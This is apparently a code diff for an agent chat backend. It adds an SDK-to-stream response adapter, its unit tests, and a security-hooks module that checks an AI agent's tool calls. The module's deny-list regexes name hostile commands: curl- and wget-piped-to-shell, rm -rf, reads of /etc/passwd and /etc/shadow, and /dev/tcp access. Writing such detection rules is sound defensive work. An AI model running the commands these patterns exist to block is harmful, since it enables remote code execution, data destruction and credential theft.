+        self.has_ended_text = False
+        # tool_use_id -> {"name": <tool name without the MCP prefix>}
+        self.current_tool_calls: dict[str, dict[str, str]] = {}
+        self.task_id: str | None = None
+        # True between a StreamStartStep and its matching StreamFinishStep.
+        self.step_open = False
+
+    def set_task_id(self, task_id: str) -> None:
+        """Set the task ID for reconnection support."""
+        self.task_id = task_id
+
+    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
+        """Convert a single SDK message to Vercel AI SDK format.
+
+        Args:
+            sdk_message: The next message received from the Claude Agent SDK.
+
+        Returns:
+            The stream events for this message, in emission order. The list
+            may be empty (e.g. a non-``init`` system message).
+        """
+        responses: list[StreamBaseResponse] = []
+
+        if isinstance(sdk_message, SystemMessage):
+            if sdk_message.subtype == "init":
+                responses.append(
+                    StreamStart(messageId=self.message_id, taskId=self.task_id)
+                )
+                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+        elif isinstance(sdk_message, AssistantMessage):
+            # After tool results, the SDK sends a new AssistantMessage for the
+            # next LLM turn. Open a new step if the previous one was closed.
+            if not self.step_open:
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+            for block in sdk_message.content:
+                if isinstance(block, TextBlock):
+                    # Empty text blocks produce no events at all.
+                    if block.text:
+                        self._ensure_text_started(responses)
+                        responses.append(
+                            StreamTextDelta(id=self.text_block_id, delta=block.text)
+                        )
+
+                elif isinstance(block, ToolUseBlock):
+                    self._end_text_if_open(responses)
+
+                    # Strip MCP prefix so frontend sees "find_block"
+                    # instead of "mcp__copilot__find_block".
+                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
+
+                    responses.append(
+                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
+                    )
+                    responses.append(
+                        StreamToolInputAvailable(
+                            toolCallId=block.id,
+                            toolName=tool_name,
+                            input=block.input,
+                        )
+                    )
+                    # Remembered so the later tool result can be labelled.
+                    self.current_tool_calls[block.id] = {"name": tool_name}
+
+        elif isinstance(sdk_message, UserMessage):
+            # UserMessage carries tool results back from tool execution.
+            content = sdk_message.content
+            blocks = content if isinstance(content, list) else []
+            for block in blocks:
+                if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
+                    tool_name = tool_info.get("name", "unknown")
+
+                    # Prefer the stashed full output over the SDK's
+                    # (potentially truncated) ToolResultBlock content.
+                    # The SDK truncates large results, writing them to disk,
+                    # which breaks frontend widget parsing.
+                    # NOTE(review): the stash is looked up by tool name, not
+                    # by tool_use_id — confirm this is safe when the same
+                    # tool is called more than once in a turn.
+                    output = pop_pending_tool_output(tool_name) or (
+                        _extract_tool_output(block.content)
+                    )
+
+                    responses.append(
+                        StreamToolOutputAvailable(
+                            toolCallId=block.tool_use_id,
+                            toolName=tool_name,
+                            output=output,
+                            success=not (block.is_error or False),
+                        )
+                    )
+
+            # Close the current step after tool results — the next
+            # AssistantMessage will open a new step for the continuation.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+        elif isinstance(sdk_message, ResultMessage):
+            self._end_text_if_open(responses)
+            # Close the step before finishing.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+            # Emit token usage if the SDK reported it
+            usage = getattr(sdk_message, "usage", None) or {}
+            if usage:
+                # "or 0" also covers keys that are present but set to None.
+                input_tokens = usage.get("input_tokens") or 0
+                output_tokens = usage.get("output_tokens") or 0
+                responses.append(
+                    StreamUsage(
+                        promptTokens=input_tokens,
+                        completionTokens=output_tokens,
+                        totalTokens=input_tokens + output_tokens,
+                    )
+                )
+
+            if sdk_message.subtype == "success":
+                responses.append(StreamFinish())
+            else:
+                # A ResultMessage ends the run whatever its subtype is, so
+                # every non-success subtype (not only "error" and
+                # "error_during_execution") must surface an error and finish
+                # the stream; otherwise the client would wait indefinitely.
+                if sdk_message.subtype not in ("error", "error_during_execution"):
+                    logger.warning(
+                        f"SDK run ended with result subtype: {sdk_message.subtype}"
+                    )
+                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
+                responses.append(
+                    StreamError(errorText=str(error_msg), code="sdk_error")
+                )
+                responses.append(StreamFinish())
+
+        else:
+            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
+
+        return responses
+
+    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
+        """Start (or restart) a text block if needed.
+
+        A block that was already ended is never reopened: a new block ID is
+        generated and a fresh ``StreamTextStart`` is appended instead.
+        """
+        if not self.has_started_text or self.has_ended_text:
+            if self.has_ended_text:
+                self.text_block_id = str(uuid.uuid4())
+                self.has_ended_text = False
+            responses.append(StreamTextStart(id=self.text_block_id))
+            self.has_started_text = True
+
+    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
+        """End the current text block if one is open."""
+        if self.has_started_text and not self.has_ended_text:
+            responses.append(StreamTextEnd(id=self.text_block_id))
+            self.has_ended_text = True
+
+
+def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+    """Extract a string output from a ToolResultBlock's content field.
+
+    Args:
+        content: The raw ``content`` of a tool result: a string, a list of
+            content items, or ``None``.
+
+    Returns:
+        * ``""`` for ``None``;
+        * the string itself for string content;
+        * the concatenated ``text`` of all ``{"type": "text"}`` items when
+          the list contains at least one;
+        * otherwise the JSON encoding of ``content``, falling back to
+          ``str(content)`` if it is not JSON-serializable.
+    """
+    if content is None:
+        return ""
+    if isinstance(content, str):
+        return content
+
+    if isinstance(content, list):
+        # Items that are not dicts are ignored here instead of raising, and
+        # a missing/None text contributes an empty string.
+        parts = [
+            str(item.get("text") or "")
+            for item in content
+            if isinstance(item, dict) and item.get("type") == "text"
+        ]
+        if parts:
+            return "".join(parts)
+
+    try:
+        return json.dumps(content)
+    except (TypeError, ValueError):
+        return str(content)
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
@@ -0,0 +1,366 @@
+"""Unit tests for the SDK response adapter."""
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+)
+
+from .response_adapter import SDKResponseAdapter
+from .tool_adapter import MCP_TOOL_PREFIX
+
+
+def _adapter() -> SDKResponseAdapter:
+    """Build an adapter with fixed message and task IDs for the tests."""
+    adapter = SDKResponseAdapter(message_id="msg-1")
+    adapter.set_task_id("task-1")
+    return adapter
+
+
+# -- SystemMessage -----------------------------------------------------------
+
+
+def test_system_init_emits_start_and_step():
+    """An "init" SystemMessage yields StreamStart followed by StreamStartStep."""
+    events = _adapter().convert_message(SystemMessage(subtype="init", data={}))
+    assert len(events) == 2
+    start, step = events
+    assert isinstance(start, StreamStart)
+    assert start.messageId == "msg-1"
+    assert start.taskId == "task-1"
+    assert isinstance(step, StreamStartStep)
+
+
+def test_system_non_init_emits_nothing():
+    """SystemMessages other than "init" produce no stream events."""
+    other = SystemMessage(subtype="other", data={})
+    assert _adapter().convert_message(other) == []
+
+
+# -- AssistantMessage with TextBlock -----------------------------------------
+
+
+def test_text_block_emits_step_start_and_delta():
+    """First assistant text opens a step and a text block, then emits the delta."""
+    events = _adapter().convert_message(
+        AssistantMessage(content=[TextBlock(text="hello")], model="test")
+    )
+    assert len(events) == 3
+    step, text_start, delta = events
+    assert isinstance(step, StreamStartStep)
+    assert isinstance(text_start, StreamTextStart)
+    assert isinstance(delta, StreamTextDelta)
+    assert delta.delta == "hello"
+
+
+def test_empty_text_block_emits_only_step():
+    """An empty TextBlock is skipped, but the step is still opened."""
+    events = _adapter().convert_message(
+        AssistantMessage(content=[TextBlock(text="")], model="test")
+    )
+    assert len(events) == 1
+    (only,) = events
+    assert isinstance(only, StreamStartStep)
+
+
+def test_multiple_text_deltas_reuse_block_id():
+    """Back-to-back text messages stream into the same text block."""
+    adapter = _adapter()
+    first = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="a")], model="test")
+    )
+    second = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="b")], model="test")
+    )
+
+    # First message: step + text start + delta.
+    assert len(first) == 3
+    assert isinstance(first[0], StreamStartStep)
+    assert isinstance(first[1], StreamTextStart)
+
+    # Second message: only a delta, since block and step are already open.
+    assert len(second) == 1
+    assert isinstance(second[0], StreamTextDelta)
+
+    # Both refer to the same block ID.
+    assert first[1].id == second[0].id
+
+
+# -- AssistantMessage with ToolUseBlock --------------------------------------
+
+
+def test_tool_use_emits_input_start_and_available():
+    """The MCP prefix on incoming tool names is stripped before emission."""
+    tool_use = ToolUseBlock(
+        id="tool-1",
+        name=f"{MCP_TOOL_PREFIX}find_agent",
+        input={"q": "x"},
+    )
+    events = _adapter().convert_message(
+        AssistantMessage(content=[tool_use], model="test")
+    )
+
+    assert len(events) == 3
+    step, input_start, input_available = events
+    assert isinstance(step, StreamStartStep)
+
+    assert isinstance(input_start, StreamToolInputStart)
+    assert input_start.toolCallId == "tool-1"
+    assert input_start.toolName == "find_agent"  # prefix stripped
+
+    assert isinstance(input_available, StreamToolInputAvailable)
+    assert input_available.toolName == "find_agent"  # prefix stripped
+    assert input_available.input == {"q": "x"}
+
+
+def test_text_then_tool_ends_text_block():
+    """A tool call arriving after text closes the open text block first."""
+    adapter = _adapter()
+
+    # Opens the step and the text block.
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
+    )
+
+    events = adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+
+    # Step is already open: TextEnd, ToolInputStart, ToolInputAvailable.
+    assert len(events) == 3
+    assert isinstance(events[0], StreamTextEnd)
+    assert isinstance(events[1], StreamToolInputStart)
+
+
+# -- UserMessage with ToolResultBlock ----------------------------------------
+
+
+def test_tool_result_emits_output_and_finish_step():
+    """A tool result emits the tool output and then closes the step."""
+    adapter = _adapter()
+
+    # Register the tool call first (opens the step); the SDK sends the
+    # prefixed tool name.
+    adapter.convert_message(
+        AssistantMessage(
+            content=[
+                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})
+            ],
+            model="test",
+        )
+    )
+
+    events = adapter.convert_message(
+        UserMessage(
+            content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
+        )
+    )
+
+    assert len(events) == 2
+    output, finish_step = events
+    assert isinstance(output, StreamToolOutputAvailable)
+    assert output.toolCallId == "t1"
+    assert output.toolName == "find_agent"  # prefix stripped
+    assert output.output == "found 3 agents"
+    assert output.success is True
+    assert isinstance(finish_step, StreamFinishStep)
+
+
+def test_tool_result_error():
+    """A tool result flagged as an error is reported with success=False."""
+    adapter = _adapter()
+    tool_use = ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
+    adapter.convert_message(AssistantMessage(content=[tool_use], model="test"))
+
+    failed = ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)
+    events = adapter.convert_message(UserMessage(content=[failed]))
+
+    output_event = events[0]
+    assert isinstance(output_event, StreamToolOutputAvailable)
+    assert output_event.success is False
+    assert isinstance(events[1], StreamFinishStep)
+
+
+def test_tool_result_list_content():
+    """List-form tool result content is flattened by joining its text items."""
+    adapter = _adapter()
+    tool_use = ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})
+    adapter.convert_message(AssistantMessage(content=[tool_use], model="test"))
+
+    text_items = [
+        {"type": "text", "text": "line1"},
+        {"type": "text", "text": "line2"},
+    ]
+    events = adapter.convert_message(
+        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content=text_items)])
+    )
+
+    output_event = events[0]
+    assert isinstance(output_event, StreamToolOutputAvailable)
+    assert output_event.output == "line1line2"
+    assert isinstance(events[1], StreamFinishStep)
+
+
+def test_string_user_message_ignored():
+    """A plain string UserMessage (not tool results) produces no output."""
+    plain = UserMessage(content="hello")
+    assert _adapter().convert_message(plain) == []
+
+
+# -- ResultMessage -----------------------------------------------------------
+
+
+def test_result_success_emits_finish_step_and_finish():
+    """A successful result closes open text, closes the step, then finishes."""
+    adapter = _adapter()
+
+    # Emit some text first so a step and a text block are open.
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="done")], model="test")
+    )
+
+    success = ResultMessage(
+        subtype="success",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=False,
+        num_turns=1,
+        session_id="s1",
+    )
+    events = adapter.convert_message(success)
+
+    assert len(events) == 3
+    text_end, finish_step, finish = events
+    assert isinstance(text_end, StreamTextEnd)
+    assert isinstance(finish_step, StreamFinishStep)
+    assert isinstance(finish, StreamFinish)
+
+
+def test_result_error_emits_error_and_finish():
+    """An error result with no open step yields only StreamError + StreamFinish."""
+    failure = ResultMessage(
+        subtype="error",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=True,
+        num_turns=0,
+        session_id="s1",
+        result="API rate limited",
+    )
+    events = _adapter().convert_message(failure)
+
+    # No step was open, so there is no FinishStep.
+    assert len(events) == 2
+    error, finish = events
+    assert isinstance(error, StreamError)
+    assert "API rate limited" in error.errorText
+    assert isinstance(finish, StreamFinish)
+
+
+# -- Text after tools (new block ID) ----------------------------------------
+
+
+def test_text_after_tool_gets_new_block_id():
+    """Text -> tool -> tool result -> text: the trailing text starts anew."""
+    adapter = _adapter()
+
+    # Messages leading up to the text under test; the tool result closes
+    # the step.
+    lead_up = [
+        AssistantMessage(content=[TextBlock(text="before")], model="test"),
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        ),
+        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")]),
+    ]
+    for sdk_message in lead_up:
+        adapter.convert_message(sdk_message)
+
+    events = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="after")], model="test")
+    )
+
+    # New step, new text block, then the delta.
+    assert len(events) == 3
+    step, text_start, delta = events
+    assert isinstance(step, StreamStartStep)
+    assert isinstance(text_start, StreamTextStart)
+    assert isinstance(delta, StreamTextDelta)
+    assert delta.delta == "after"
+
+
+# -- Full conversation flow --------------------------------------------------
+
+
+def test_full_conversation_flow():
+    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
+    sdk_messages = [
+        # 1. Init
+        SystemMessage(subtype="init", data={}),
+        # 2. Assistant text
+        AssistantMessage(content=[TextBlock(text="Let me search")], model="test"),
+        # 3. Tool use
+        AssistantMessage(
+            content=[
+                ToolUseBlock(
+                    id="t1",
+                    name=f"{MCP_TOOL_PREFIX}find_agent",
+                    input={"query": "email"},
+                )
+            ],
+            model="test",
+        ),
+        # 4. Tool result
+        UserMessage(
+            content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
+        ),
+        # 5. More text
+        AssistantMessage(content=[TextBlock(text="I found 2")], model="test"),
+        # 6. Result
+        ResultMessage(
+            subtype="success",
+            duration_ms=500,
+            duration_api_ms=400,
+            is_error=False,
+            num_turns=2,
+            session_id="s1",
+        ),
+    ]
+
+    adapter = _adapter()
+    emitted: list[StreamBaseResponse] = []
+    for sdk_message in sdk_messages:
+        emitted.extend(adapter.convert_message(sdk_message))
+
+    expected = [
+        "StreamStart",
+        "StreamStartStep",  # step 1: text + tool call
+        "StreamTextStart",
+        "StreamTextDelta",  # "Let me search"
+        "StreamTextEnd",  # closed before tool
+        "StreamToolInputStart",
+        "StreamToolInputAvailable",
+        "StreamToolOutputAvailable",  # tool result
+        "StreamFinishStep",  # step 1 closed after tool result
+        "StreamStartStep",  # step 2: continuation text
+        "StreamTextStart",  # new block after tool
+        "StreamTextDelta",  # "I found 2"
+        "StreamTextEnd",  # closed by result
+        "StreamFinishStep",  # step 2 closed
+        "StreamFinish",
+    ]
+    assert [type(event).__name__ for event in emitted] == expected
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
@@ -0,0 +1,393 @@
+"""Security hooks for Claude Agent SDK integration.
+
+This module provides security hooks that validate tool calls before execution,
+ensuring multi-user isolation and preventing unauthorized operations.
+"""
+
+import json
+import logging
+import os
+import re
+import shlex
+from typing import Any, cast
+
+from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
+
+logger = logging.getLogger(__name__)
+
+# Tools that are blocked entirely (CLI/system access).
+# _validate_tool_access tests membership with an exact, case-sensitive match,
+# so the capitalised "Bash" tool is not caught here; it is listed in
+# SANDBOXED_BASH_TOOLS and validated separately.
+BLOCKED_TOOLS = {
+    "bash",
+    "shell",
+    "exec",
+    "terminal",
+    "command",
+}
+
+# Commands permitted in the sandboxed Bash tool.
+# These are meant to be data-processing / inspection utilities only — no
+# writes, no network, and nothing that launches another program.
+#
+# ``xargs`` and ``tee`` are deliberately NOT listed: ``xargs`` executes whatever
+# program it receives as an argument (arguments are never checked against this
+# allowlist, so it would defeat it), and ``tee`` writes files.
+# NOTE(review): ``find`` (-exec / -delete), ``sed`` (-i, ``w`` / ``e`` commands)
+# and ``awk`` (system(), output redirection) can still write or execute.  They
+# are kept because they are core inspection tools, but their arguments are not
+# vetted by this allowlist.
+ALLOWED_BASH_COMMANDS = {
+    # JSON / structured data
+    "jq",
+    # Text processing
+    "grep",
+    "egrep",
+    "fgrep",
+    "rg",
+    "head",
+    "tail",
+    "cat",
+    "wc",
+    "sort",
+    "uniq",
+    "cut",
+    "tr",
+    "sed",
+    "awk",
+    "column",
+    "fold",
+    "fmt",
+    "nl",
+    "paste",
+    "rev",
+    # File inspection (read-only)
+    "find",
+    "ls",
+    "file",
+    "stat",
+    "du",
+    "tree",
+    "basename",
+    "dirname",
+    "realpath",
+    # Utilities
+    "echo",
+    "printf",
+    "date",
+    "true",
+    "false",
+    # Comparison / encoding
+    "diff",
+    "comm",
+    "base64",
+    "md5sum",
+    "sha256sum",
+}
+
+# Tools allowed only when their path argument stays within the SDK workspace.
+# The SDK uses these to handle oversized tool results (writes to tool-results/
+# files, then reads them back) and for workspace file operations.
+# _validate_tool_access routes these names to _validate_workspace_path.
+WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
+
+# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
+# _validate_tool_access routes these names to _validate_bash_command.
+SANDBOXED_BASH_TOOLS = {"Bash"}
+
+# Dangerous patterns in tool inputs.
+# Each entry is a regular expression that _validate_tool_access applies with
+# ``re.search(..., re.IGNORECASE)`` to the JSON-serialised tool input.  The
+# patterns are unanchored, so they also match inside longer words (``sudo``
+# matches "pseudo"); the check therefore errs on the side of denying.
+DANGEROUS_PATTERNS = [
+    r"sudo",
+    r"rm\s+-rf",
+    r"dd\s+if=",
+    r"/etc/passwd",
+    r"/etc/shadow",
+    r"chmod\s+777",
+    r"curl\s+.*\|.*sh",
+    r"wget\s+.*\|.*sh",
+    r"eval\s*\(",
+    r"exec\s*\(",
+    r"__import__",
+    r"os\.system",
+    r"subprocess",
+]
+
+
+def _deny(reason: str) -> dict[str, Any]:
+    """Build the PreToolUse hook payload that rejects a tool call.
+
+    Args:
+        reason: Human-readable explanation stored as the denial reason.
+
+    Returns:
+        A dict with a single ``hookSpecificOutput`` entry marking the decision
+        as ``deny``.
+    """
+    decision: dict[str, Any] = {
+        "hookEventName": "PreToolUse",
+        "permissionDecision": "deny",
+        "permissionDecisionReason": reason,
+    }
+    return {"hookSpecificOutput": decision}
+
+
+def _validate_workspace_path(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate that a workspace-scoped tool only accesses allowed paths.
+
+    Allowed directories:
+    - The SDK working directory (``/tmp/copilot-<session>/``)
+    - The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
+
+    Both ``file_path`` and ``path`` are validated when supplied, so a benign
+    value in one key cannot mask an out-of-workspace value in the other.
+
+    Args:
+        tool_name: Name of the tool being validated (used in messages only).
+        tool_input: Raw tool arguments.
+        sdk_cwd: SDK working directory, or ``None`` when no workspace is set.
+
+    Returns:
+        Empty dict to allow, or a denial payload from ``_deny``.
+    """
+    supplied = [tool_input.get(key) for key in ("file_path", "path")]
+    candidates = [value for value in supplied if value]
+    if not candidates:
+        # Glob/Grep without a path default to cwd which is already sandboxed
+        return {}
+
+    norm_cwd = os.path.normpath(sdk_cwd) if sdk_cwd else None
+    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+
+    for path in candidates:
+        resolved = None
+        # Non-string paths cannot be validated and are denied below.
+        if isinstance(path, str):
+            expanded = os.path.expanduser(path)
+            # Relative paths are interpreted relative to the workspace.
+            # NOTE(review): assumes the tools run with sdk_cwd as their cwd.
+            if norm_cwd and not os.path.isabs(expanded):
+                expanded = os.path.join(norm_cwd, expanded)
+            resolved = os.path.normpath(expanded)
+
+            # Allow access within the SDK working directory
+            if norm_cwd and (
+                resolved == norm_cwd or resolved.startswith(norm_cwd + os.sep)
+            ):
+                continue
+
+            # Allow ~/.claude/projects/<project>/tool-results/... only when
+            # "tool-results" is a real path component below a project
+            # directory (a substring match would also accept e.g.
+            # ".../tool-results-notes.txt").
+            # NOTE(review): this still admits other sessions' tool-results
+            # directories; restricting to this session needs the SDK's exact
+            # project-directory encoding.
+            if resolved.startswith(claude_dir + os.sep):
+                parts = resolved[len(claude_dir) + 1 :].split(os.sep)
+                if "tool-results" in parts[1:]:
+                    continue
+
+        logger.warning(
+            f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
+        )
+        return _deny(
+            f"Tool '{tool_name}' can only access files within the workspace directory."
+        )
+
+    return {}
+
+
+# Characters that form shell control / redirection operators when unquoted.
+# Newlines are included because the shell treats them as command separators.
+_BASH_OPERATOR_CHARS = "();<>|&\n\r"
+
+# ``NAME=value`` prefix that may precede a command word (env assignment).
+_BASH_ASSIGNMENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*=")
+
+
+def _tokenize_bash(command: str) -> list[str]:
+    """Split ``command`` into words and shell-operator tokens.
+
+    Unlike ``shlex.split``, operators are separated from adjacent words even
+    without surrounding whitespace (``a|b`` -> ``a``, ``|``, ``b``), while
+    quoted text is kept intact.  Raises ``ValueError`` on unbalanced quotes.
+    """
+    lexer = shlex.shlex(command, posix=True, punctuation_chars=_BASH_OPERATOR_CHARS)
+    lexer.whitespace_split = True
+    lexer.commenters = ""  # match shlex.split: '#' is an ordinary character
+    lexer.whitespace = " \t"  # newlines are operators, not whitespace
+    return list(lexer)
+
+
+def _is_bash_operator(token: str) -> bool:
+    """Return True when ``token`` consists solely of shell operator characters."""
+    return bool(token) and all(ch in _BASH_OPERATOR_CHARS for ch in token)
+
+
+def _bash_path_in_workspace(path: str, norm_cwd: str, claude_dir: str) -> bool:
+    """Return True when ``path`` resolves inside the workspace or tool-results."""
+    resolved = os.path.normpath(os.path.join(norm_cwd, os.path.expanduser(path)))
+    if resolved == norm_cwd or resolved.startswith(norm_cwd + os.sep):
+        return True
+    if resolved.startswith(claude_dir + os.sep):
+        # Require "tool-results" as a path component below a project directory.
+        parts = resolved[len(claude_dir) + 1 :].split(os.sep)
+        return "tool-results" in parts[1:]
+    return False
+
+
+def _validate_bash_command(
+    tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate a Bash command against the allowlist of safe commands.
+
+    Only allowlisted data-processing commands may run (jq, grep, head, etc.).
+    Blocks command substitution, output redirection, ``/dev/`` access and
+    disallowed executables.
+
+    The command is tokenized with a punctuation-aware ``shlex`` lexer so that
+    quoted text stays intact (a jq filter containing ``|`` is one argument)
+    while unquoted operators are recognised even without surrounding
+    whitespace (``cat f|python`` or ``echo a;rm b``).  Every word that follows
+    a control operator (``|``, ``||``, ``&&``, ``;``, ``&``, a newline,
+    parentheses) must be an allowlisted command.
+
+    In POSIX mode a quoted operator character (``grep '|' f``) cannot be told
+    apart from a real operator; such commands are treated as if the operator
+    were real, which can only make validation stricter.
+
+    Args:
+        tool_input: Raw tool arguments; the command is read from ``command``.
+        sdk_cwd: SDK working directory.  When ``None`` path arguments are not
+            validated (only the command allowlist applies).
+
+    Returns:
+        Empty dict to allow, or a denial payload from ``_deny``.
+    """
+    command = tool_input.get("command", "")
+    if not command or not isinstance(command, str):
+        return _deny("Bash command is empty.")
+
+    # Block command substitution — can smuggle arbitrary commands
+    if "$(" in command or "`" in command:
+        return _deny("Command substitution ($() or ``) is not allowed in Bash.")
+
+    # Block /dev/ access (e.g., /dev/tcp for network)
+    if "/dev/" in command:
+        return _deny("Access to /dev/ is not allowed in Bash.")
+
+    try:
+        tokens = _tokenize_bash(command)
+    except ValueError:
+        return _deny("Malformed command (unmatched quotes).")
+
+    # Walk tokens: the first non-assignment word after a control operator is a
+    # command name and must be allowlisted.
+    expect_command = True
+    for index, token in enumerate(tokens):
+        if _is_bash_operator(token):
+            if ">" in token:
+                following = tokens[index + 1] if index + 1 < len(tokens) else ""
+                is_fd = following == "-" or (
+                    following.isascii() and following.isdigit()
+                )
+                # ``2>&1`` style descriptor duplication writes no file.
+                if token == ">&" and is_fd:
+                    continue
+                # Block output redirection — Bash should be read-only
+                return _deny("Output redirection (> or >>) is not allowed in Bash.")
+            if set(token) == {"<"}:
+                # Input redirection only reads; its target is path-checked below.
+                continue
+            expect_command = True
+            continue
+        if expect_command:
+            # Skip env var assignments (VAR=value)
+            if _BASH_ASSIGNMENT_RE.match(token):
+                continue
+            cmd_name = os.path.basename(token)
+            if cmd_name not in ALLOWED_BASH_COMMANDS:
+                allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
+                logger.warning(f"Blocked Bash command: {cmd_name}")
+                return _deny(
+                    f"Command '{cmd_name}' is not allowed. "
+                    f"Allowed commands: {allowed}"
+                )
+            expect_command = False
+
+    # Validate that path-like arguments stay within the workspace
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+        for token in tokens:
+            if _is_bash_operator(token):
+                continue
+            # Also inspect the value of NAME=value / --option=value tokens.
+            candidates = [token]
+            if "=" in token:
+                candidates.append(token.split("=", 1)[1])
+            for candidate in candidates:
+                looks_like_escape = candidate.startswith(("/", "~")) or (
+                    ".." in candidate.split("/")
+                )
+                if not looks_like_escape:
+                    continue
+                if _bash_path_in_workspace(candidate, norm_cwd, claude_dir):
+                    continue
+                logger.warning(f"Blocked Bash path outside workspace: {token}")
+                return _deny(
+                    f"Bash can only access files within the workspace directory. "
+                    f"Path '{token}' is outside the workspace."
+                )
+
+    return {}
+
+
+def _validate_tool_access(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Decide whether a (non-CoPilot) tool call may proceed.
+
+    Checks are applied in order: outright-blocked tools, sandboxed Bash,
+    workspace-scoped file tools, then a dangerous-pattern scan of the input
+    for every other tool.
+
+    Returns:
+        Empty dict to allow, or dict with hookSpecificOutput to deny
+    """
+    if tool_name in BLOCKED_TOOLS:
+        logger.warning(f"Blocked tool access attempt: {tool_name}")
+        return _deny(
+            f"Tool '{tool_name}' is not available. "
+            "Use the CoPilot-specific tools instead."
+        )
+
+    if tool_name in SANDBOXED_BASH_TOOLS:
+        # Command allowlist plus workspace-scoped paths.
+        return _validate_bash_command(tool_input, sdk_cwd)
+
+    if tool_name in WORKSPACE_SCOPED_TOOLS:
+        # File tools must stay inside the SDK workspace directory.
+        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
+
+    # json.dumps gives a predictable text form (str() would be a Python repr).
+    serialized = json.dumps(tool_input) if tool_input else ""
+    matched = next(
+        (
+            pattern
+            for pattern in DANGEROUS_PATTERNS
+            if re.search(pattern, serialized, re.IGNORECASE)
+        ),
+        None,
+    )
+    if matched is None:
+        return {}
+
+    logger.warning(
+        f"Blocked dangerous pattern in tool input: {matched} in {tool_name}"
+    )
+    return _deny("Input contains blocked pattern")
+
+
+def _validate_user_isolation(
+    tool_name: str, tool_input: dict[str, Any], user_id: str | None
+) -> dict[str, Any]:
+    """Validate that tool calls respect user isolation.
+
+    For tools whose name contains "workspace", every supplied ``path`` /
+    ``file_path`` argument must be relative and free of ``..``.  Both keys are
+    checked so a harmless value in one cannot hide a traversal in the other.
+
+    Args:
+        tool_name: Tool name with any MCP prefix already stripped.
+        tool_input: Raw tool arguments.
+        user_id: Current user, used for logging only.
+
+    Returns:
+        Empty dict to allow, or a denial payload from ``_deny``.
+    """
+    if "workspace" not in tool_name.lower():
+        return {}
+
+    for key in ("path", "file_path"):
+        path = tool_input.get(key, "")
+        if not path:
+            continue
+        # Check for path traversal
+        if ".." in path or path.startswith("/"):
+            logger.warning(f"Blocked path traversal attempt: {path} by user {user_id}")
+            return _deny("Path traversal not allowed")
+
+    return {}
+
+
+def create_security_hooks(
+    user_id: str | None, sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Create the security hooks configuration for Claude Agent SDK.
+
+    Includes security validation and observability hooks:
+    - PreToolUse: Security validation before tool execution
+    - PostToolUse: Log successful tool executions
+    - PostToolUseFailure: Log and handle failed tool executions
+    - PreCompact: Log context compaction events (SDK handles compaction automatically)
+
+    The SDK is imported lazily inside the function.  If the import fails an
+    empty dict is returned, which means NO validation hook is installed.
+
